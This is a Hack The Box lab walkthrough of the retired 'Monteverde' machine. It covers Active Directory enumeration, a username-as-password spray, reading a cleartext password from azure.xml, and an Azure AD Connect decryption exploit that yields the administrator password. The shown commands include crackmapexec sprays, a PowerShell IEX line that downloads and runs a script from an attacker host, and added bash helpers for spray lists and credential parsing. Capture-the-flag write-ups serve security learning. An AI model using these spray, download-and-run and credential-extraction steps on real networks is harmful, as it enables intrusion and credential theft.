Monteverde : HTB walkthrough

Dhanishtha Awasthi
4 min read · Jun 14, 2020

Now that the machine has retired, it's time to go through the process of solving it. This was a considerably easy machine if you are familiar with Windows.

ENUMERATION

Nmap scan revealed the following

So we see we have Active Directory on this machine. Both LDAP ports report the same info:

  1. DOMAIN : MEGABANK.LOCAL0
  2. HOST: MONTEVERDE

I was not satisfied with this, so I did a full-port Nmap scan... A good habit!!!

It took ages but was worth it. Lots of ports were open. Let's start with enumeration.

RPC Enumeration

Connecting via rpcclient works using an anonymous login: rpcclient -U '' 10.10.10.172 -N

Let us save the user and group names to a list, users.txt, for a password-guessing attack. I also added Dimitry, Sally, Ray, etc. for a better username list.

user list

SMB Enumeration

smbclient -U '' -L //10.10.10.172 : Anonymous login accepted, but no workgroup available.

KERBEROS Enumeration

AS-REP roasting: not possible. No account has "Do not require Kerberos preauthentication" set, so there is nothing to AS-REP roast.

PASSWORD CRACKING

  1. Tried hydra but ended with an invalid response.
  2. CrackMapExec against WinRM (port 5985):

root@kali:~/Downloads/htb/Monteverde#crackmapexec winrm 10.10.10.172 -u ~/Downloads/htb/Monteverde/users.txt -p /pass1.txt

This did not work, so I tried SMB.

root@kali:~/Downloads/htb/Monteverde# crackmapexec smb 10.10.10.172 -u ~/Downloads/htb/Monteverde/users.txt -p pass1.txt

SABatchJobs logs in with its own username as the password: bad password practices by developers or sysadmins.
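The user-list step above and the username-as-password spray that found SABatchJobs are the two places a script saves time, so here is an added example (mine, not part of the original write-up) that turns rpcclient's enumdomusers output into users.txt and a same-order pass.txt for crackmapexec's --no-bruteforce mode. The enumdomusers sample is constructed (the line format is rpcclient's real one, but the AAD account name and RIDs are placeholders), and the target IP and output paths are whatever you pass in.

```shell
#!/usr/bin/env bash
# Added example: build users.txt and a "password = username" pass.txt
# from rpcclient enumdomusers output for a one-attempt-per-account spray.
set -eu

# Constructed sample of `rpcclient -U '' -N 10.10.10.172 -c enumdomusers`
# output. Line format is rpcclient's; the AAD name and RIDs are placeholders.
SAMPLE_ENUMDOMUSERS='user:[Guest] rid:[0x1f5]
user:[AAD_0123456789ab] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]'

# Keep only the bracketed username from each enumdomusers line.
parse_enumdomusers() {
    sed -n 's/^user:\[\([^]]*\)\] rid:\[[^]]*\]$/\1/p'
}

# Write $1/users.txt and $1/pass.txt so that line N of pass.txt equals
# line N of users.txt. Guest is dropped. Extra guesses taken from display
# names (as the write-up did) are appended via $2, one per line, and
# duplicates are removed. Prints the number of candidate accounts.
build_spray_lists() {
    outdir=$1
    extra=${2:-}
    {
        printf '%s\n' "$SAMPLE_ENUMDOMUSERS" | parse_enumdomusers | grep -vi '^guest$'
        if [ -n "$extra" ]; then printf '%s\n' "$extra"; fi
    } | awk '!seen[$0]++' > "$outdir/users.txt"
    cp "$outdir/users.txt" "$outdir/pass.txt"
    grep -c '' "$outdir/users.txt"
}

# The spray needs a live target, so the command is only printed here.
# --no-bruteforce pairs line N of -u with line N of -p (one attempt per
# account, so one failed logon per user against the lockout threshold);
# --continue-on-success keeps going after the first hit so every weak
# account gets reported, not just the first.
spray_command() {
    printf 'crackmapexec smb %s -u %s/users.txt -p %s/pass.txt --no-bruteforce --continue-on-success\n' "$1" "$2" "$2"
}

# Usage:
#   tmp=$(mktemp -d)
#   build_spray_lists "$tmp" "$(printf 'Dimitry\nSally\nRay\n')"
#   spray_command 10.10.10.172 "$tmp"
```

Before running the spray, check the domain lockout policy (crackmapexec smb 10.10.10.172 --pass-pol with the anonymous session works here) so that one attempt per account is known to be safe; if the threshold is low, this one-password-per-user pairing is the most you should try in a single round.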

Let's go back to SMB enumeration and log in with credentials.

SMB Enumeration with credentials

Username : SABatchJobs Password : SABatchJobs

SYSVOL was readable and held some files, but the GptTmpl.inf in both policies contained no juicy info.

Found the users$ share, which contained some interesting info in azure.xml.

> get AZURE.XML

Active Directory credentials:

Let's try Kerberoasting and a WinRM login with these. Username: mhope Password: 4n0therD4y@n0th3r$
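azure.xml is a PowerShell CLIXML file, the format Export-Clixml writes, in which every property is a typed element carrying an N="name" attribute; a string property such as Password is stored in the clear. As an added example (mine, not from the original write-up), the script below pulls those properties out of such a file. The XML sample is constructed in the Export-Clixml layout with placeholder values, not the contents of the real azure.xml.

```shell
#!/usr/bin/env bash
# Added example: extract properties from a PowerShell CLIXML file like
# azure.xml. <S> is a string, <DT> a DateTime, <G> a GUID; each carries
# the property name in its N attribute.
set -eu

# Constructed sample in Export-Clixml layout; values are placeholders.
SAMPLE_AZURE_XML='<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-01T00:00:00.0000000+00:00</DT>
      <DT N="EndDate">2021-01-01T00:00:00.0000000+00:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">Pl4ceholder-P@ss$</S>
    </Props>
  </Obj>
</Objs>'

# Print every N="..." property as name=value, whatever its type tag.
# The backreference \1 makes the closing tag match the opening one.
# Values containing XML entities (&amp; etc.) would still need unescaping.
clixml_props() {
    sed -n 's/^[[:space:]]*<\([A-Z][A-Za-z]*\) N="\([^"]*\)">\([^<]*\)<\/\1>[[:space:]]*$/\2=\3/p'
}

# Print only the value of one property, e.g. clixml_prop Password.
clixml_prop() {
    clixml_props | sed -n "s/^$1=//p"
}

# Usage (file read from stdin):
#   clixml_prop Password < azure.xml
#   clixml_props < azure.xml
```

The type name under <TN> tells you what the credential is for (here an Azure AD application password object), which is worth noting before reusing it: the same string was evidently set for an on-premises account too, which is what makes it useful against WinRM.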

KERBEROASTING

No entries found, so there is nothing to roast. Maybe Windows Remote Management works... Try Evil-WinRM.

EVIL-WinRM: Windows Remote Management Login

So I first cross-checked with CrackMapExec to see whether WinRM is accessible with these credentials.

Great!! It shows Pwn3d!. Let's log in with evil-winrm.

Finally Got USER !!!!!!

PRIVILEGE ESCALATION

First things first: I tried Windows-Exploit-Suggester.py, but it seems Python was not installed on the machine, so I went for the JAWS enumeration script.

*Evil-WinRM* PS C:\Users\mhope\Desktop> IEX(new-object net.webclient).downloadString('http://10.10.14.75:8000/jaws-enum.ps1')

So you see here that mhope shares the Azure Admins group with the AAD_98********* user and ADMINISTRATOR, and the only running service of any interest was Azure AD Sync.

  1. Azure AD Connect Exploit

https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/

"Exploit can get us plain text credentials of whatever AD account is set to use it": ADMINISTRATOR

Ok, so we have three options:

  • ADSyncDecrypt
  • ADSyncGather
  • ADSyncQuery

Of these, ADSyncDecrypt matches all our requirements. We will run the exploit from the bin folder of the AD Sync directory.
Note that mcrypt.dll lives in that folder and the tool needs it to decrypt the stored credentials, so when you transfer AdDecrypt.exe, transfer mcrypt.dll alongside it too; otherwise the decryption will not work.

I got a precompiled version here: https://github.com/VbScrub/AdSyncDecrypt/releases. So I transferred AdDecrypt.exe and mcrypt.dll to my writable directory on the target machine, which was C:\Users\mhope\Desktop, then went to the location below and ran the command.

C:\Program Files\Microsoft Azure AD Sync\bin

*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\bin> C:\Users\mhope\Desktop\AdDecrypt.exe


There was an error finding LocalDB, so I ran it again with the -FullSQL flag. You can see the difference here and why that flag was needed:

By default the tool connects to the ADSync database on a LocalDB instance; with -FullSQL it queries the ADSync database on the full SQL Server instance instead, which is how it is hosted on this box.
This time it worked.

Username: administrator Password: d0m@in4dminyeah

Now let's make a Windows Remote Management (Evil-WinRM) connection using these creds.

Logged in as ADMINISTRATOR
Found the flag.

EUREKA !!!! We got the root.
